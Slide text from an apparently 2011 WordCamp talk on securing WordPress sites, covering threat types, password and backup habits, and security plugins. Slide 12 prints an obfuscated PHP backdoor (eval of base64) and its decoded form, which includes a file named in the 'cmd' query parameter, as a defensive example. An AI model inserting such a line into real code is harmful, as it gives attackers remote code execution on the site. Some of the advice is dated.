Securing Your WordPress Website - WordCamp GC 2011


Published on

Presentation slides from Vladimir Lasky's talk on how to harden your WordPress website against would-be attackers and avoid inadvertently creating security holes.

Contains various tips and recommendations for off-the-shelf plugins to mitigate common security threats,

Presented on Sunday 6th November at WordCamp Gold Coast 2011.

Published in: Technology, Business
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Securing Your WordPress Website - WordCamp GC 2011

  1. 1. Securing Your WordPress Website Vladimir Lasky WordCamp GC 2011
  2. 2. For the Impatient, Lazy and Easily Distracted <ul><li>Rename your admin account </li></ul><ul><li>Only download plugins and themes hosted on and regularly update them </li></ul><ul><li>Change your database table prefix from “wp_” to something random using “WordPress Table Rename” plugin </li></ul><ul><li>Install the plugin “Semisecure Login Reimagined” </li></ul>
  3. 3. Does This Describe You? <ul><li>Seldom update your WordPress installation & plugins </li></ul><ul><li>Seldom backup your WordPress installation & plugins </li></ul><ul><li>Access your WordPress site over public computers and/or Wi-Fi networks </li></ul><ul><li>Use the same password on multiple websites </li></ul><ul><li>Download themes and plugins from third-party sites or file sharing networks </li></ul><ul><li>Rely on cheap developers found through online freelance websites </li></ul><ul><li>You may be at risk! </li></ul>
  4. 4. How We Achieve Security <ul><li>The only perfect security is to not have a website - Anything else is relative </li></ul><ul><li>Our goals: </li></ul><ul><ul><li>Make the attacker pick on a weaker target </li></ul></ul><ul><ul><li>Avoid creating a security hole ourselves </li></ul></ul><ul><li>Our plan: </li></ul><ul><ul><li>To use off-the-shelf WordPress plugins where possible and avoid doing anything to break compatibility with other plugins or complicate day-to-day activities </li></ul></ul>
  5. 5. The Three Pillars of Security PREVENTION DETECTION RECOVERY
  6. 6. Know Your Enemy <ul><li>Cyber Criminals </li></ul><ul><li>Cheap Thrill Seekers AKA “Script Kiddies” </li></ul><ul><li>Business Rivals </li></ul><ul><li>Disgruntled Employees </li></ul><ul><li>Ideological Enemies </li></ul>
  7. 7. What Do Attackers Want to Achieve? <ul><li>Cheap thrills </li></ul><ul><li>Material for identity theft </li></ul><ul><li>Damage reputation of a business </li></ul><ul><li>Disrupt e-Commerce </li></ul><ul><li>To create a &quot;Botnet“ – a staging point for attacks against a third party. </li></ul><ul><li>Obtaining restricted information </li></ul><ul><li>Black-hat SEO (usually backlink generation) </li></ul>
  8. 8. Characterising Security Threats <ul><li>Active/Passive Method </li></ul><ul><li>The aims of the other party </li></ul><ul><li>Their knowledge of you </li></ul><ul><li>Their level of motivation </li></ul><ul><li>The level of difficulty required </li></ul><ul><li>What is their alternative option </li></ul>
  9. 9. Top Security Threats <ul><li>Brute Force Password Attacks </li></ul><ul><li>Code Injection Attacks (SQL/PHP and XSS) </li></ul><ul><li>Denial of Service Attacks </li></ul><ul><li>Sniffing Network Traffic to Recover Plaintext Passwords and Session Cookies </li></ul><ul><li>Malicious Code within Themes/Plugins </li></ul>
  10. 10. Brute Force Password Attack Example
  11. 11. Classic SQL Injection Example
  12. 12. Malicious Code Example <ul><li>The following is a line of obfuscated PHP code in a compromised plugin or theme: </li></ul><ul><ul><li>eval(base64_decode(&quot;aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=&quot;)); </li></ul></ul><ul><li>This evaluates as the following PHP statement: </li></ul><ul><ul><li>if(isset($_GET[&quot;cmd&quot;]))include $_GET[&quot;cmd&quot;]; </li></ul></ul><ul><li>This allows an attacker to run any PHP script on your site by setting the query parameter ‘cmd’ in the URL: </li></ul><ul><ul><li> </li></ul></ul>
  13. 13. Good Habits <ul><li>Only obtain free plugins and themes hosted on </li></ul><ul><li>Buy premium plugins/themes from the Author's website, which should have their contact details </li></ul><ul><li>Update your WordPress installation and plugins regularly </li></ul><ul><li>When travelling, access the Internet from your own smartphone or notebook computer – not from an Internet Cafe </li></ul>
  14. 14. Choosing a Password <ul><li>Twelve characters long as a minimum, but not a dictionary word </li></ul><ul><li>Common number/letter substitutions are not very useful </li></ul><ul><li>A good mnemonic technique: come up with a memorable sentence, and use the first letters of each word to form the password e.g. </li></ul><ul><ul><li>“ Jack and Jill went up the hill to fetch a pale of water” could form a 13-character password “JaJwuthtfapow” </li></ul></ul>
  15. 15. Secure Your Backups <ul><li>Most automated backup plugins operate this way: </li></ul><ul><ul><li>They archive your database and installation files </li></ul></ul><ul><ul><li>They upload this archive to a remote site using saved authentication details </li></ul></ul><ul><li>If your site is compromised, these saved authentication details could be used to destroy your saved backups </li></ul><ul><li>The solution: Automated Remote Backups </li></ul>
  16. 16. Automated Remote Backups <ul><li>Instead: </li></ul><ul><ul><li>Use the backup plugin ONLY to archive your Database and Installation files and place them in a a private folder </li></ul></ul><ul><ul><li>Configure a remote system to periodically connect to your site via SFTP/FTP and download this backup file. </li></ul></ul><ul><li>If a hacker compromises your system, they will not be able to destroy your saved backups </li></ul><ul><li>Good article on implementing this: </li></ul><ul><ul><li> </li></ul></ul>
  17. 17. Plugin: Semisecure Login Reimagined <ul><li>Purpose </li></ul><ul><ul><li>Encrypts passwords without requiring SSL. Instead, it uses JavaScript to encrypt the password </li></ul></ul><ul><li>Benefits: </li></ul><ul><ul><li>Simple installation – just activate </li></ul></ul><ul><ul><li>Eliminates risk of obtaining password by sniffing network traffic </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>All other traffic is unencrypted. WordPress session cookie is still vulnerable </li></ul></ul>
  18. 18. Plugin: WordPress HTTPS (SSL) <ul><li>Purpose: </li></ul><ul><ul><li>All traffic between Web Browser and Blog is encrypted </li></ul></ul><ul><li>Benefits: </li></ul><ul><ul><li>Eliminates risk of password sniffing and session hijacking </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Requires a web host with a Shared SSL certificate (HostGator, BlueHost). </li></ul></ul><ul><ul><li>Alternatively, you must obtain a SSL Certificate in the name of your primary Domain and get your web host to install it. </li></ul></ul><ul><ul><li>Higher CPU Usage on web server </li></ul></ul>
  19. 19. Plugin: Theme Authenticity Checker <ul><li>Purpose: </li></ul><ul><ul><li>Scans your theme files for presence of code that is likely to be malicious </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Rapidly scans theme files without having to look through code manually </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Does not scan plugins </li></ul></ul><ul><ul><li>Not guaranteed to find all types of malicious code </li></ul></ul>
  20. 20. Plugin: WordPress File Monitor Plus <ul><li>Purpose </li></ul><ul><ul><li>Periodically checks to see if any files have been added, changed or deleted in your WordPress installation </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Will detect many types of PHP injection attacks and other forms of intrusion </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Will generate false alarms. You may specify folders to be excluded, but then there is a risk that those could be compromised unknowingly </li></ul></ul><ul><ul><li>Small chance that a very well-targeted attack could inactivate or sabotage the plugin before it raises the alarm </li></ul></ul>
  21. 21. Plugin: WordPress Firewall 2 <ul><li>Purpose </li></ul><ul><ul><li>Monitors web requests and blocks those that seem suspicious </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>Will block majority of SQL and PHP Injection attempts </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Small performance overhead on each request </li></ul></ul><ul><ul><li>On most aggressive setting, could interfere with some plugins </li></ul></ul>
  22. 22. Plugin: Useful 404s <ul><li>Purpose </li></ul><ul><ul><li>Detects broken links on your website, or broken links on external sites and sends you an email </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>As a side effect, it also can detect attempts to compromise your site – namely, where the attacker spoofs the HTTP_REFERER flag and attempts to blindly access plugins or theme files that may not exist </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Lots and lots of false alarms </li></ul></ul>
  23. 23. Plugin: Email PHP Errors Plugin <ul><li>Purpose </li></ul><ul><ul><li>Captures PHP error output and can also generate emails with error reports. Helps detect bugs in plugins, themes or problems with the web host </li></ul></ul><ul><li>Benefit: </li></ul><ul><ul><li>As a side effect, may detect some types of PHP injection attempts or other attempts to exploit code vulnerabilities </li></ul></ul><ul><ul><li>People often overlook their error_logs and let them pile up </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Lots of false alarms </li></ul></ul>
  24. 24. Plugin: WP-Ban <ul><li>Purpose </li></ul><ul><ul><li>Ban users by IP, IP Range, host name, user agent and referrer URL from visiting your site </li></ul></ul><ul><li>Benefit : </li></ul><ul><ul><li>Useful for blocking repeat attacks by the same party </li></ul></ul><ul><ul><li>Able to reduce the impact of denial of service (DOS) attacks </li></ul></ul><ul><li>Limitations: </li></ul><ul><ul><li>Need to determine details of specific attacker(s) </li></ul></ul><ul><ul><li>A wise attacker will change their IP addresses frequently </li></ul></ul><ul><ul><li>Can block innocent people </li></ul></ul>
  25. 25. Conclusion <ul><li>WordPress Codex - Hardening WordPress </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li>Various tips for site administrators to improve your site security </li></ul></ul><ul><li>WordPress Codex – Data Validation </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li>A must for developers - describes all the facilities available in WordPress to validate data, preventing your code from being vulnerable to code injection exploits </li></ul></ul><ul><li>Questions and Comments: </li></ul><ul><ul><li> </li></ul></ul>